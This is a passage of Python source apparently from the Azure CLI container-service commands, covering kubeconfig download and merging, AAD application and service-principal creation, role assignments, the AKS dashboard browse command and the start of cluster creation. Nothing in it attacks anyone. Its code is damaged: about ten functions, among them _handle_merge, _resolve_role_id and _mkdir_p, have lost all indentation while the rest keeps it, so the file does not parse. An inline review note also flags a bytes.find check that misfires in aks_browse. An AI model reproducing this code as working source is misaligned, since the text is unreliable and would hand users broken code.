def load_service_principals(config_path):
    """Read and parse the stored service principal file; None when missing or unreadable."""
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as handle:
            return shell_safe_json_parse(handle.read())
    except:  # pylint: disable=bare-except
        # Deliberately best-effort: a corrupt store behaves like an empty one.
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Submit (or only validate) an incremental ARM deployment built from *template*.

    :param validate: when True only run template validation, do not deploy.
    :param no_wait: when True return immediately instead of polling the operation.
    :param subscription_id: target a subscription other than the default when provided.
    """
    from azure.cli.core.profiles import ResourceType
    DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')
    # Resource API 2019-10-01+ takes a Deployment model (and validation is a
    # long-running operation); older API versions take the properties directly.
    if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
        Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
        deployment = Deployment(properties=properties)
        if validate:
            validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
    if validate:
        return smc.validate(resource_group_name, deployment_name, properties)
    return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
                        path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
                        ssh_key_file=None,
                        overwrite_existing=False):
    """Download and install kubectl credentials from the cluster master
    :param name: The name of the cluster.
    :type name: str
    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param path: Where to install the kubectl config file
    :type path: str
    :param ssh_key_file: Path to an SSH key file to use
    :type ssh_key_file: str
    :param overwrite_existing: Overwrite clashing entries in the kubeconfig without prompting
    :type overwrite_existing: bool
    """
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
    """Copy the kubeconfig from the cluster master over SCP and merge it into *path*.

    When *path* already exists, the config is first downloaded to a sibling
    file named '<path>-<name>-<ix>' and then merged into *path*.
    """
    if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
        raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
    dns_prefix = acs_info.master_profile.dns_prefix  # pylint: disable=no-member
    location = acs_info.location  # pylint: disable=no-member
    user = acs_info.linux_profile.admin_username  # pylint: disable=no-member
    _mkdir_p(os.path.dirname(path))
    # Find a candidate file name that does not exist yet to download into.
    path_candidate = path
    ix = 0
    while os.path.exists(path_candidate):
        ix += 1
        path_candidate = '{}-{}-{}'.format(path, name, ix)
    # TODO: this only works for public cloud, need other casing for national clouds
    acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
                           '.kube/config', path_candidate, key_filename=ssh_key_file)
    # merge things
    if path_candidate != path:
        try:
            merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
        except yaml.YAMLError as exc:
            # Best effort: keep the downloaded copy and tell the user where it is.
            logger.warning('Failed to merge credentials to kube config file: %s', exc)
            logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Load a kubeconfig YAML file, mapping common failures onto CLIError."""
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) != errno.ENOENT:
            raise
        raise CLIError('{} does not exist'.format(filename))
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in *addition_file* into *existing_file* and save it.

    :param replace: overwrite clashing entries without prompting.
    :param context_name: when given, rename the incoming context/cluster to this name.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # Validate before any dereference: an empty/blank kubeconfig parses to
    # None, and the original post-hoc check never fired because the code
    # below had already raised TypeError on addition['contexts'].
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']
    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)
    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)
    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
    print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
    """
    Fetch the ContainerService object from the Azure REST API.
    :param name: ACS resource name
    :type name: String
    :param resource_group_name: Resource group name
    :type resource_group_name: String
    """
    client = cf_container_services(cli_ctx, None)
    return client.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
    """Scale the first agent pool of a container service to *new_agent_count* agents."""
    acs = client.get(resource_group_name, container_service_name)
    acs.agent_pool_profiles[0].count = new_agent_count  # pylint: disable=no-member
    # null out the service principal because otherwise validation complains
    is_kubernetes = acs.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes
    if is_kubernetes:
        acs.service_principal_profile = None
    # null out the windows profile so that validation doesn't complain about not having the admin password
    acs.windows_profile = None
    return client.create_or_update(resource_group_name, container_service_name, acs)
def list_container_services(cmd, client, resource_group_name=None):
    ''' List Container Services. '''
    if resource_group_name:
        services = client.list_by_resource_group(resource_group_name=resource_group_name)
    else:
        services = client.list()
    return list(services)
def show_service_principal(client, identifier):
    """Resolve *identifier* to an AAD object id and return the matching service principal."""
    return client.get(_resolve_service_principal(client, identifier))
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Create an AAD application registration.

    Returns a tuple ``(application, aad_session_key)`` where the session key is
    read from the 'ocp-aad-session-key' response header.
    :raises CLIError: with a help link when the caller lacks directory permissions
    """
    from azure.graphrbac.models import GraphErrorException
    # password and key credentials are mutually exclusive; the helper validates this
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                        key_usage, start_date, end_date)
    app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                   display_name=display_name,
                                                   identifier_uris=identifier_uris,
                                                   homepage=homepage,
                                                   reply_urls=reply_urls,
                                                   key_credentials=key_creds,
                                                   password_credentials=password_creds,
                                                   required_resource_access=required_resource_accesses)
    try:
        # raw=True exposes the HTTP response so the session-key header can be read
        result = client.create(app_create_param, raw=True)
        return result.output, result.response.headers["ocp-aad-session-key"]
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Update credentials and/or reply URLs of an existing AAD application.

    Only key credentials, password credentials and reply_urls are patched here.
    NOTE(review): display_name, homepage, identifier_uris and the remaining
    parameters are accepted (mirroring create_application's signature) but are
    never sent — confirm this is intentional.
    :raises CLIError: with a help link when the caller lacks directory permissions
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                        key_usage, start_date, end_date)
    try:
        if key_creds:
            client.update_key_credentials(object_id, key_creds)
        if password_creds:
            client.update_password_credentials(object_id, password_creds)
        if reply_urls:
            client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
        return
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Build ``(password_creds, key_creds)`` lists for an AAD application.

    At most one of *password* / *key_value* may be supplied; the corresponding
    list is populated and the other stays None. Dates may be ISO strings and
    default to now .. now + 1 year.
    :raises CLIError: when both password and key_value are provided
    """
    if password and key_value:
        raise CLIError('specify either --password or --key-value, but not both.')
    if not start_date:
        start_date = datetime.datetime.utcnow()
    elif isinstance(start_date, str):
        start_date = dateutil.parser.parse(start_date)
    if not end_date:
        # default credential lifetime is one year from the start date
        end_date = start_date + relativedelta(years=1)
    elif isinstance(end_date, str):
        end_date = dateutil.parser.parse(end_date)
    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'
    password_creds = None
    key_creds = None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
    return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an AAD application.

    :param identifier: app id (GUID), identifier URI, or application object id
    :param resolve_app: when True, resolve *identifier* to the application's appId first
    :param rbac_client: optional pre-built graph RBAC client (created when None)
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)
    if resolve_app:
        # A parseable GUID is treated as an appId; anything else as an identifier URI.
        try:
            uuid.UUID(identifier)
            result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
        except ValueError:
            result = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not result:  # assume we get an object id
            result = [rbac_client.applications.get(identifier)]
        app_id = result[0].app_id
    else:
        app_id = identifier
    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Create a role assignment, resolving *assignee* to an object id only when it is a service principal."""
    return _create_role_assignment(cli_ctx, role, assignee,
                                   resource_group_name=resource_group_name, scope=scope,
                                   resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment for *assignee* at the computed scope.

    :param role: role name or role-definition GUID
    :param assignee: client id (resolved to an object id) or an object id
    :param resolve_assignee: False when *assignee* is already an object id (e.g. MSI)
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
    role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
    # assignment names are arbitrary; a fresh GUID guarantees uniqueness
    assignment_name = uuid.uuid4()
    custom_headers = None
    return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, service principal name, or object id) to an AAD object id.

    :raises CLIError: when nothing in the graph matches
    """
    client = get_graph_rbac_management_client(cli_ctx)
    result = None
    if '@' in assignee:  # looks like a user principal name
        result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
    if not result:
        result = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not result:  # assume an object id, let us verify it
        result = _get_object_stubs(client, [assignee])
    # 2+ matches should never happen, so we only check 'no match' here
    if not result:
        raise CLIError("No matches in graph database for '{}'".format(assignee))
    return result[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Fetch directory object stubs for the given object ids."""
    query = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(query))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True when a Network Contributor role assignment already exists at *scope*."""
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    assignments_client = get_auth_management_client(cli_ctx, scope).role_assignments
    return any(
        assignment.scope == scope and assignment.role_definition_id.endswith(network_contributor_role_id)
        for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()'))
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
               listen_address='127.0.0.1', listen_port='8001'):
    """Open the Kubernetes dashboard of a managed cluster through a local kubectl proxy.

    Requires kubectl on PATH and the kube-dashboard addon to be enabled on the
    cluster. Writes credentials to a temporary kubeconfig, locates the dashboard
    pod and port, then blocks running ``kubectl proxy`` until interrupted.
    :raises CLIError: when kubectl is missing, the addon is disabled, or the
        dashboard pod/port cannot be discovered
    """
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles if k.lower() == 'kubeDashboard'.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    if not addon_profile.enabled:
        raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
                       'To use "az aks browse" first enable the add-on '
                       'by running "az aks enable-addons --addons kube-dashboard".\n'
                       'Starting with Kubernetes 1.19, AKS no longer support installation of '
                       'the managed kube-dashboard addon.\n'
                       'Please use the Kubernetes resources view in the Azure portal (preview) instead.')
    # credentials go to a throwaway kubeconfig used only by this command
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # find the port
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))
    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'
    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning('To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async(dashboardURL)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
                                     listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            # NOTE(review): bytes.find returns -1 (truthy) when the flag text is
            # absent, so this branch also runs for other proxy failures — confirm
            # whether `!= -1` was intended here.
            if err.output.find(b'unknown flag: --address'):
                if listen_address != '127.0.0.1':
                    logger.warning('"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning('The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
    """Raise CLIError when an SSH key is required but missing or not a valid RSA public key."""
    if no_ssh_key:
        return
    try:
        if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
            raise ValueError()
    except (TypeError, ValueError):
        shortened_key = truncate_text(ssh_key_value)
        raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to its SP or omsagent MSI.

    Prefers the cluster's service principal when one exists (client_id != 'msi');
    otherwise falls back to the omsagent addon's managed identity. Logs a warning
    instead of raising when no identity is found or the assignment fails.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            ('omsagent' in result.addon_profiles) and
            (hasattr(result.addon_profiles['omsagent'], 'identity')) and
            (hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
    ):
        logger.info('omsagent MSI exists, using it')
        service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                    service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
            logger.warning('Could not create a role assignment for Monitoring addon. '
                           'Are you an Owner on this subscription?')
    else:
        # BUG FIX: the two literals previously joined without a space ("roleassignment").
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value,  # pylint: disable=too-many-locals
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               uptime_sla=False,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               vnet_subnet_id=None,
               max_pods=0,
               min_count=None,
               max_count=None,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               zones=None,
               enable_node_public_ip=False,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               api_server_authorized_ip_ranges=None,
               enable_private_cluster=False,
               enable_managed_identity=False,
               attach_acr=None,
               enable_aad=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               no_wait=False):
    """Create a managed Kubernetes (AKS) cluster.

    Builds the ManagedCluster model from the many optional parameters (agent
    pool, linux/windows profiles, service principal or managed identity,
    networking, addons, AAD, API-server access profile) and submits
    create_or_update, retrying while a newly created service principal
    propagates through Active Directory (up to 30 attempts, 3s apart).
    """
    _validate_ssh_key(no_ssh_key, ssh_key_value)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
    # default the cluster location to the resource group's location
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
    load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
    if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
        raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
    # --- system agent pool ---
    agent_pool_profile = ManagedClusterAgentPoolProfile(
        name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
        tags=nodepool_tags,
        node_labels=nodepool_labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type="Linux",
        storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
        vnet_subnet_id=vnet_subnet_id,
        availability_zones=zones,
        enable_node_public_ip=enable_node_public_ip,
        max_pods=int(max_pods) if max_pods else None,
        type=vm_set_type,
        mode="System"
    )
    if node_osdisk_size:
        agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
    linux_profile = None
    # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
    if not no_ssh_key:
        ssh_config = ContainerServiceSshConfiguration(
            public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
        linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
    # --- windows profile (prompts interactively for missing credentials) ---
    windows_profile = None
    if windows_admin_username or windows_admin_password:
        # To avoid that windows_admin_password is set but windows_admin_username is not
        if windows_admin_username is None:
            try:
                from knack.prompting import prompt
                windows_admin_username = prompt('windows_admin_username: ')
                # The validation for admin_username in ManagedClusterWindowsProfile will fail even if
                # users still set windows_admin_username to empty here
            except NoTTYException:
                raise CLIError('Please specify username for Windows in non-interactive mode.')
        if windows_admin_password is None:
            try:
                windows_admin_password = prompt_pass(
                    msg='windows-admin-password: ', confirm=True)
            except NoTTYException:
                raise CLIError(
                    'Please specify both username and password in non-interactive mode.')
        windows_license_type = None
        if enable_ahub:
            windows_license_type = 'Windows_Server'
        windows_profile = ManagedClusterWindowsProfile(
            admin_username=windows_admin_username,
            admin_password=windows_admin_password,
            license_type=windows_license_type)
    # Skip create service principal profile for the cluster if the cluster
    # enables managed identity and customer doesn't explicitly provide a service principal.
    service_principal_profile = None
    principal_obj = None
    if not(enable_managed_identity and not service_principal and not client_secret):
        principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
                                                      service_principal=service_principal, client_secret=client_secret,
                                                      subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
                                                      location=location, name=name)
        service_principal_profile = ManagedClusterServicePrincipalProfile(
            client_id=principal_obj.get("service_principal"),
            secret=principal_obj.get("client_secret"),
            key_vault_secret_ref=None)
    if (vnet_subnet_id and not skip_subnet_role_assignment and
            not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # if service_principal_profile is None, then this cluster is an MSI cluster,
        # and the service principal does not exist. For now, We just tell user to grant the
        # permission after the cluster is created to keep consistent with portal experience.
        if service_principal_profile is None:
            logger.warning('The cluster is an MSI cluster, please manually grant '
                           'Network Contributor role to the system assigned identity '
                           'after the cluster is created, see '
                           'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity')
        else:
            scope = vnet_subnet_id
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_profile.client_id, scope=scope):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
    load_balancer_profile = create_load_balancer_profile(
        load_balancer_managed_outbound_ip_count,
        load_balancer_outbound_ips,
        load_balancer_outbound_ip_prefixes,
        load_balancer_outbound_ports,
        load_balancer_idle_timeout)
    if attach_acr:
        if enable_managed_identity:
            if no_wait:
                raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
                               '--no-wait is not allowed, please wait until the whole operation succeeds.')
            # Attach acr operation will be handled after the cluster is created
        else:
            _ensure_aks_acr(cmd.cli_ctx,
                            client_id=service_principal_profile.client_id,
                            acr_name_or_id=attach_acr,
                            subscription_id=subscription_id)
    outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
    # --- network profile ---
    network_profile = None
    if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
            docker_bridge_address, network_policy]):
        if not network_plugin:
            raise CLIError('Please explicitly specify the network plugin type')
        if pod_cidr and network_plugin == "azure":
            raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
        network_profile = ContainerServiceNetworkProfile(
            network_plugin=network_plugin,
